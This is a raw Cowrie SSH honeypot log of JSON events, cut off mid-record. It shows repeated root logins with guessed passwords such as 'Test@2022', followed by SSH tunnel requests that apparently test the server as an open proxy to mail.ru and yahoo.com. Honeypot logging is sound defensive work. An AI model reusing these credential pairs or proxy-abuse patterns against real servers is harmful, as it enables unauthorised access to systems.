{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":28994,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd8dcda98083","protocol":"ssh","message":"New connection: 77.83.207.83:28994 (1.2.3.4:22) [session: cd8dcda98083]","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.709729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.719717Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:08.760122Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.010287Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":799,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:799","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.061368Z","session":"cd8dcda98083"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.111725Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":628,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:628","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.252554Z","session":"cd8dcda98083"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.302716Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.354982Z","src_ip":"212.227.235.229","session":"28d8203542bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":8736,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:8736","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.444514Z","session":"cd8dcda98083"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.494589Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.545617Z","src_ip":"77.83.207.83","session":"cd8dcda98083"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29093,"dst_ip":"1.2.3.4","dst_port":22,"session":"94c571d883f1","protocol":"ssh","message":"New connection: 77.83.207.83:29093 (1.2.3.4:22) [session: 94c571d883f1]","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.594152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.603003Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.644257Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.892797Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":30459,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:30459","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.943466Z","session":"94c571d883f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:09.993396Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":28990,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:28990","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.136200Z","session":"94c571d883f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.186032Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":32077,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:32077","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.328244Z","session":"94c571d883f1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.378332Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.429224Z","src_ip":"77.83.207.83","session":"94c571d883f1"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29189,"dst_ip":"1.2.3.4","dst_port":22,"session":"26acf1406fc8","protocol":"ssh","message":"New connection: 77.83.207.83:29189 (1.2.3.4:22) [session: 26acf1406fc8]","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.477851Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.486841Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43830,"dst_ip":"1.2.3.4","dst_port":22,"session":"97bc1f783e88","protocol":"ssh","message":"New connection: 212.227.235.229:43830 (1.2.3.4:22) [session: 97bc1f783e88]","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.503691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.504474Z","src_ip":"212.227.235.229","session":"97bc1f783e88"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.527947Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.775136Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22425,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22425","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.825691Z","session":"26acf1406fc8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.843158Z","src_ip":"212.227.235.229","session":"97bc1f783e88"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:10.875254Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":5295,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5295","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.016093Z","session":"26acf1406fc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.065830Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":9910,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9910","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.207944Z","session":"26acf1406fc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.257803Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.308122Z","src_ip":"77.83.207.83","session":"26acf1406fc8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29273,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ca61e8a5244","protocol":"ssh","message":"New connection: 77.83.207.83:29273 (1.2.3.4:22) [session: 2ca61e8a5244]","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.357029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.367386Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.407063Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.656104Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13289,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13289","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.707664Z","session":"2ca61e8a5244"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.757757Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":28113,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:28113","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.900254Z","session":"2ca61e8a5244"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:11.950356Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":22338,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:22338","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.092277Z","session":"2ca61e8a5244"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.142326Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.193306Z","src_ip":"77.83.207.83","session":"2ca61e8a5244"}
{"eventid":"cowrie.login.failed","username":"ovhusr","password":"123456","message":"login attempt [ovhusr/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.229987Z","src_ip":"212.227.235.229","session":"97bc1f783e88"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":29382,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb637fb57b5a","protocol":"ssh","message":"New connection: 77.83.207.83:29382 (1.2.3.4:22) [session: fb637fb57b5a]","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.243464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:52:12.244358Z","src_ip":"77.83.207.83","session":"fb637fb57b5a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nist